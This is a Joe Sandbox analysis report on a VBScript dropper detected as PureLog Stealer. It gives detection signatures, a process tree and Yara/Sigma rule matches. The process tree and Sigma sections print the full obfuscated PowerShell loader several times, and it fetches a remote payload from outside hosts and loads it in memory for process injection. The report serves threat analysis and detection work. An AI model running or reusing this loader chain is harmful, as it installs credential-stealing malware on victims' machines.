Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kz1fEn2R9Z.vbs

Overview

General Information

Sample name:kz1fEn2R9Z.vbs
renamed because original name is a hash value
Original sample name:80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03.vbs
Analysis ID:1523834
MD5:10a145cb87654a33c6c0beda947466b8
SHA1:a504192f1b5ac44e6e49b4bc9ef660220c604469
SHA256:80e7c85eeb0a57e9f50e7d84e0eb1b2f2230837b53080d24696fab7373e9bc03
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kz1fEn2R9Z.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1788155155.000001A636EF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000003.00000002.1770505012.000001A62EDFE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      Process Memory Space: powershell.exe PID: 7600INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x1d905:$b3: ::UTF8.GetString(
      • 0x1dee6:$b3: ::UTF8.GetString(
      • 0x1e6bc:$b3: ::UTF8.GetString(
      • 0x1ee60:$b3: ::UTF8.GetString(
      • 0x3c92c:$b3: ::UTF8.GetString(
      • 0x3c9d9:$b3: ::UTF8.GetString(
      • 0x3cf89:$b3: ::UTF8.GetString(
      • 0x4e9f8:$b3: ::UTF8.GetString(
      • 0x4f137:$b3: ::UTF8.GetString(
      • 0x4f722:$b3: ::UTF8.GetString(
      • 0x51358:$b3: ::UTF8.GetString(
      • 0x735fe:$b3: ::UTF8.GetString(
      • 0x79d87:$b3: ::UTF8.GetString(
      • 0x7a368:$b3: ::UTF8.GetString(
      • 0x7b2d0:$b3: ::UTF8.GetString(
      • 0x7b9ff:$b3: ::UTF8.GetString(
      • 0x7c2ef:$b3: ::UTF8.GetString(
      • 0x7ca69:$b3: ::UTF8.GetString(
      • 0x7d2c2:$b3: ::UTF8.GetString(
      • 0x7dbd5:$b3: ::UTF8.GetString(
      • 0xad6c5:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 7768INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xbf94df:$b2: ::FromBase64String(
      • 0xbfab05:$b2: ::FromBase64String(
      • 0x2d350:$s1: -jOiN
      • 0x2d76d:$s1: -jOiN
      • 0x320bc:$s1: -join
      • 0xc7e19:$s1: -jOiN
      • 0xc8dca:$s1: -jOiN
      • 0xc938f:$s1: -jOiN
      • 0xcf790:$s1: -join
      • 0xdaec3:$s1: -join
      • 0xe7f98:$s1: -join
      • 0xeb36a:$s1: -join
      • 0xeba1c:$s1: -join
      • 0xed50d:$s1: -join
      • 0xef713:$s1: -join
      • 0xeff3a:$s1: -join
      • 0xf07aa:$s1: -join
      • 0xf0ee5:$s1: -join
      • 0xf0f17:$s1: -join
      • 0xf0f5f:$s1: -join
      • 0xf0f7e:$s1: -join

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.powershell.exe.1a62f612b80.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        3.2.powershell.exe.1a636ef0000.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          3.2.powershell.exe.1a636ef0000.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            3.2.powershell.exe.1a62f612b80.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKydGYicrJ2FzZScrJzY0Q29udCcrJ2UnKyduJysndCk7ZycrJ1lGYScrJ3MnKydzJysnZW1ibCcrJ3kgPSBbUmVmbCcrJ2VjJysndGknKydvbi5BJysnc3MnKydlbWJseScrJ10nKyc6OicrJ0xvYWQoZ1lGYmknKyduYXJ5JysnQ29uJysndGVudCcrJyk7Z1lGdHlwZSA9IGdZRmEnKydzc2VtJysnYmx5LkcnKydldFR5cGUnKycoQ05BUnVuUEUnKycuSCcrJ29tJysnZUNOJysnQSk7Z1lGJysnbWUnKyd0aCcrJ29kID0gZ1lGdCcrJ3lwZS5HZXRNZXRob2QoQ05BVicrJ0FJQ05BKTtnWUZtZXRob2QuSW52b2tlKGdZRicrJ251bGwsIFtvYmplYycrJ3RbJysnXV1AKENOQXR4dC4nKydBWlBQSEMvNTQnKyczLzg0MS4nKycyMy44NjEnKycuJysnNDAxLy86cHR0aENOQSAsIENOQWRlc2F0aXZhZG9DTkEgLCBDTkFkZXNhdGl2YScrJ2RvQ04nKydBICwnKycgQ04nKydBJysnZGVzYXRpdicrJ2EnKydkb0NOQSxDJysnTkFSZScrJ2dBc21DTkEnKycsQycrJ05BQ05BJysnKSknKS5yRVBsYUNFKCdDTkEnLFtzdHJJbmddW0NIYXJdMzkpLnJFUGxhQ0UoJ2dZRicsJyQnKSB8IC4gKCAkZU5WOkNPbXNwRWNbNCwyNiwyNV0tak9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle
              Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
              Sigma detected: Potential PowerShell Command Line Obfuscation
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
              Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+'deta'+'h-n'+'o'+'te-'+'v/DetahN'+'oteV'+'.'+'txtCNA'+';gYFbase'+'64Content '+'= (Ne'+'w'+'-Obj'+'ec'+'t'+' Syst'+'em.N'+'et'+'.WebClien'+'t)'+'.Download'+'String(gYF'+'url)'+';g'+'YFbinar'+'y'+'Content = '+'[System'+'.Con'+'vert'+']::FromBase64S'+'t'+'ring'+'(gY'+'Fb'+'ase'+'64Cont'+'e'+'n'+'t);g'+'YFa'+'s'+'s'+'embl'+'y = [Refl'+'ec'+'ti'+'on.A'+'ss'+'embly'+']'+'::'+'Load(gYFbi'+'nary'+'Con'+'tent'+');gYFtype = gYFa'+'ssem'+'bly.G'+'etType'+'(CNARunPE'+'.H'+'om'+'eCN'+'A);gYF'+'me'+'th'+'od = gYFt'+'ype.GetMethod(CNAV'+'AICNA);gYFmethod.Invoke(gYF'+'null, [objec'+'t['+']]@(CNAtxt.'+'AZPPHC/54'+'3/841.'+'23.861'+'.'+'401//:ptthCNA , CNAdesativadoCNA , CNAdesativa'+'doCN'+'A ,'+' CN'+'A'+'desativ'+'a'+'doCNA,C'+'NARe'+'gAsmCNA'+',C'+'NACNA'+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdnJysnWUZ1cmwgPSAnKydDJysnTkEnKydodHQnKydwcycrJzovJysnL2lhNjAwMTAwJysnLnVzLicrJ2FyY2hpdmUuJysnb3JnLzI0LycrJ2l0JysnZW1zLycrJ2RldGEnKydoLW4nKydvJysndGUtJysndi9EZXRhaE4nKydvdGVWJysnLicrJ3R4dENOQScrJztnWUZiYXNlJysnNjRDb250ZW50ICcrJz0gKE5lJysndycrJy1PYmonKydlYycrJ3QnKycgU3lzdCcrJ2VtLk4nKydldCcrJy5XZWJDbGllbicrJ3QpJysnLkRvd25sb2FkJysnU3RyaW5nKGdZRicrJ3VybCknKyc7ZycrJ1lGYmluYXInKyd5JysnQ29udGVudCA9ICcrJ1tTeXN0ZW0nKycuQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpbmcnKycoZ1knKyd
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
